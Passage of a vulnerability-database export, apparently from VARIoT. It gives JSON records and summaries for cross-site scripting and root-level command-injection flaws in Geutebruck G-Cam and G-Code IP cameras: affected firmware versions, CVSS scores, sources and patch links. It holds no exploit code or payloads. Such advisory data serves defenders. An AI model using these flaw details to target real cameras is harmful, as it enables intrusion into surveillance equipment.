"url": "https://www.geutebrueck.com/en_en.html"
},
{
"trust": 0.6,
"url": "https://www.securityfocus.com/bid/108579"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/162091"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22347"
},
{
"db": "VULMON",
"id": "CVE-2019-10957"
},
{
"db": "BID",
"id": "108579"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014195"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-090"
},
{
"db": "NVD",
"id": "CVE-2019-10957"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-22347"
},
{
"db": "VULMON",
"id": "CVE-2019-10957"
},
{
"db": "BID",
"id": "108579"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014195"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-090"
},
{
"db": "NVD",
"id": "CVE-2019-10957"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-22347"
},
{
"date": "2020-01-17T00:00:00",
"db": "VULMON",
"id": "CVE-2019-10957"
},
{
"date": "2019-06-05T00:00:00",
"db": "BID",
"id": "108579"
},
{
"date": "2020-02-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-014195"
},
{
"date": "2019-06-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-090"
},
{
"date": "2020-01-17T18:15:12.180000",
"db": "NVD",
"id": "CVE-2019-10957"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-22347"
},
{
"date": "2020-02-10T00:00:00",
"db": "VULMON",
"id": "CVE-2019-10957"
},
{
"date": "2019-06-05T00:00:00",
"db": "BID",
"id": "108579"
},
{
"date": "2024-12-27T03:08:00",
"db": "JVNDB",
"id": "JVNDB-2019-014195"
},
{
"date": "2020-02-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-090"
},
{
"date": "2024-11-21T04:20:13.960000",
"db": "NVD",
"id": "CVE-2019-10957"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-090"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Geutebruck\u00a0IP\u00a0Camera\u00a0G-Code\u00a0 and \u00a0G-Cam\u00a0 Cross-site scripting vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-014195"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-090"
}
],
"trust": 0.6
}
}
VAR-202001-1489
Vulnerability from variot - Updated: 2024-12-28 22:51Geutebruck IP Cameras G-Code(EEC-2xxx), G-Cam(EBC-21xx/EFD-22xx/ETHC-22xx/EWPC-22xx): All versions 1.12.0.25 and prior may allow a remote authenticated attacker with access to network configuration to supply system commands to the server, leading to remote code execution as root. Geutebruck IP Camera G-Code and G-Cam for, OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. G-Cam is a web camera series launched by Geutebrück. G-Code is an analog video encoder launched by Geutebrück.
Geutebrück G-Cam and G-Code have OS command injection vulnerabilities. The vulnerability stems from the fact that external input data constructs executable commands for the operating system, and the network system or product does not properly filter special characters and commands. Attackers can use this vulnerability to execute illegal operating system commands. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and inject and execute arbitrary commands. Other attacks are also possible. The following products of Geutebruck are affected: G-Code EEC-2xxx version 1.12.0.25 and prior G-Cam EBC-21xx version 1.12.0.25 and prior G-Cam EFD-22xx version 1.12.0.25 and prior G-Cam ETHC-22xx version 1.12.0.25 and prior G-Cam EWPC-22xx version 1.12.0.25 and prior
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202001-1489",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "g-code eec-2400",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam ebc-2110",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam efd-2241",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam ethc-2249",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam ethc-2239",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam ebc-2111",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam efd-2250",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam ethc-2240",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam ewpc-2270",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam efd-2240",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam ethc-2230",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam/efd-2240",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-code/eec-2400",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-cam/ebc-2111",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-cam/ethc-2230",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-cam/efd-2241",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-cam/ethc-2240",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-cam/ebc-2110",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-cam/ethc-2249",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-cam/ethc-2239",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-cam/efd-2250",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-cam",
"scope": "lte",
"trust": 0.6,
"vendor": "geutebruck",
"version": "\u003c=1.12.0.25"
},
{
"model": "g-code",
"scope": "lte",
"trust": 0.6,
"vendor": "geutebruck",
"version": "\u003c=1.12.0.25"
},
{
"model": "g-code/eec-2xxx",
"scope": "eq",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.0.25"
},
{
"model": "g-cam/ewpc-22xx",
"scope": "eq",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.0.25"
},
{
"model": "g-cam/ethc-22xx",
"scope": "eq",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.0.25"
},
{
"model": "g-cam/efd-22xx",
"scope": "eq",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.0.25"
},
{
"model": "g-cam/ebc-21xx",
"scope": "eq",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.0.25"
},
{
"model": "g-code/eec-2xxx",
"scope": "ne",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.13.2"
},
{
"model": "g-cam/ewpc-22xx",
"scope": "ne",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.13.2"
},
{
"model": "g-cam/ethc-22xx",
"scope": "ne",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.13.2"
},
{
"model": "g-cam/efd-22xx",
"scope": "ne",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.13.2"
},
{
"model": "g-cam/ebc-21xx",
"scope": "ne",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.13.2"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22345"
},
{
"db": "BID",
"id": "108579"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014196"
},
{
"db": "NVD",
"id": "CVE-2019-10958"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Romain Luyer and Guillaume Gronnier from CEIS, and Davy Douhine from RandoriSec reported these vulnerabilities to NCCIC., and Davy Douhine from RandoriSec, and Davy Douhine from RandoriSec.",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-087"
}
],
"trust": 0.6
},
"cve": "CVE-2019-10958",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CVE-2019-10958",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CNVD-2020-22345",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"id": "CVE-2019-10958",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.2,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-10958",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-10958",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2019-10958",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2020-22345",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201906-087",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22345"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014196"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-087"
},
{
"db": "NVD",
"id": "CVE-2019-10958"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Geutebruck IP Cameras G-Code(EEC-2xxx), G-Cam(EBC-21xx/EFD-22xx/ETHC-22xx/EWPC-22xx): All versions 1.12.0.25 and prior may allow a remote authenticated attacker with access to network configuration to supply system commands to the server, leading to remote code execution as root. Geutebruck IP Camera G-Code and G-Cam for, OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. G-Cam is a web camera series launched by Geutebr\u00fcck. G-Code is an analog video encoder launched by Geutebr\u00fcck. \n\r\n\r\nGeutebr\u00fcck G-Cam and G-Code have OS command injection vulnerabilities. The vulnerability stems from the fact that external input data constructs executable commands for the operating system, and the network system or product does not properly filter special characters and commands. Attackers can use this vulnerability to execute illegal operating system commands. \nSuccessful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and inject and execute arbitrary commands. Other attacks are also possible. \nThe following products of Geutebruck are affected:\nG-Code EEC-2xxx version 1.12.0.25 and prior\nG-Cam EBC-21xx version 1.12.0.25 and prior\nG-Cam EFD-22xx version 1.12.0.25 and prior\nG-Cam ETHC-22xx version 1.12.0.25 and prior\nG-Cam EWPC-22xx version 1.12.0.25 and prior",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-10958"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014196"
},
{
"db": "CNVD",
"id": "CNVD-2020-22345"
},
{
"db": "BID",
"id": "108579"
}
],
"trust": 2.43
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-10958",
"trust": 4.1
},
{
"db": "ICS CERT",
"id": "ICSA-19-155-03",
"trust": 3.3
},
{
"db": "BID",
"id": "108579",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014196",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-22345",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201906-087",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22345"
},
{
"db": "BID",
"id": "108579"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014196"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-087"
},
{
"db": "NVD",
"id": "CVE-2019-10958"
}
]
},
"id": "VAR-202001-1489",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22345"
}
],
"trust": 1.5020833375
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22345"
}
]
},
"last_update_date": "2024-12-28T22:51:07.538000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top\u00a0Page",
"trust": 0.8,
"url": "https://www.geutebrueck.com/"
},
{
"title": "Patch for Geutebr\u00fcck G-Cam and G-Code OS command injection vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/213555"
},
{
"title": "Multiple Geutebr\u00fcck Product Command Injection Vulnerability Fixes",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=93176"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22345"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014196"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-087"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "OS Command injection (CWE-78) [NVD evaluation ]",
"trust": 0.8
},
{
"problemtype": "OS Command injection (CWE-78) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-014196"
},
{
"db": "NVD",
"id": "CVE-2019-10958"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.us-cert.gov/ics/advisories/icsa-19-155-03"
},
{
"trust": 1.5,
"url": "https://ics-cert.us-cert.gov/advisories/icsa-19-155-03"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10958"
},
{
"trust": 0.9,
"url": "https://www.geutebrueck.com/en_en.html"
},
{
"trust": 0.6,
"url": "https://www.securityfocus.com/bid/108579"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22345"
},
{
"db": "BID",
"id": "108579"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014196"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-087"
},
{
"db": "NVD",
"id": "CVE-2019-10958"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-22345"
},
{
"db": "BID",
"id": "108579"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014196"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-087"
},
{
"db": "NVD",
"id": "CVE-2019-10958"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-22345"
},
{
"date": "2019-06-05T00:00:00",
"db": "BID",
"id": "108579"
},
{
"date": "2020-02-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-014196"
},
{
"date": "2019-06-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-087"
},
{
"date": "2020-01-17T18:15:12.260000",
"db": "NVD",
"id": "CVE-2019-10958"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-22345"
},
{
"date": "2019-06-05T00:00:00",
"db": "BID",
"id": "108579"
},
{
"date": "2024-12-27T03:07:00",
"db": "JVNDB",
"id": "JVNDB-2019-014196"
},
{
"date": "2020-01-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-087"
},
{
"date": "2024-11-21T04:20:14.093000",
"db": "NVD",
"id": "CVE-2019-10958"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-087"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Geutebruck\u00a0IP\u00a0Camera\u00a0G-Code\u00a0 and \u00a0G-Cam\u00a0 In \u00a0OS\u00a0 Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-014196"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-087"
}
],
"trust": 0.6
}
}
VAR-202008-0367
Vulnerability from variot - Updated: 2024-11-23 22:33Using a specially crafted URL command, a remote authenticated user can execute commands as root on the G-Cam and G-Code (Firmware Versions 1.12.0.25 and prior as well as the limited Versions 1.12.13.2 and 1.12.14.5). G-Cam and G-Code To OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Geutebruck GmbH is a German high-tech private company that specializes in designing and producing high-quality, perfectly matched video security solutions.
Geutebruck IP Cameras certification RCE vulnerability
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202008-0367",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "g-cam ethc-2239",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2239",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam ethc-2249",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2250",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam efd-2250",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam efd-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam ewpc-2270",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam ewpc-2270",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam efd-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2111",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2110",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam ethc-2230",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2111",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam efd-2241",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-code eec-2400",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2110",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2111",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2241",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam ethc-2239",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam efd-2250",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam ethc-2249",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam ethc-2249",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam efd-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ewpc-2270",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2230",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2230",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-code eec-2400",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2110",
"scope": "eq",
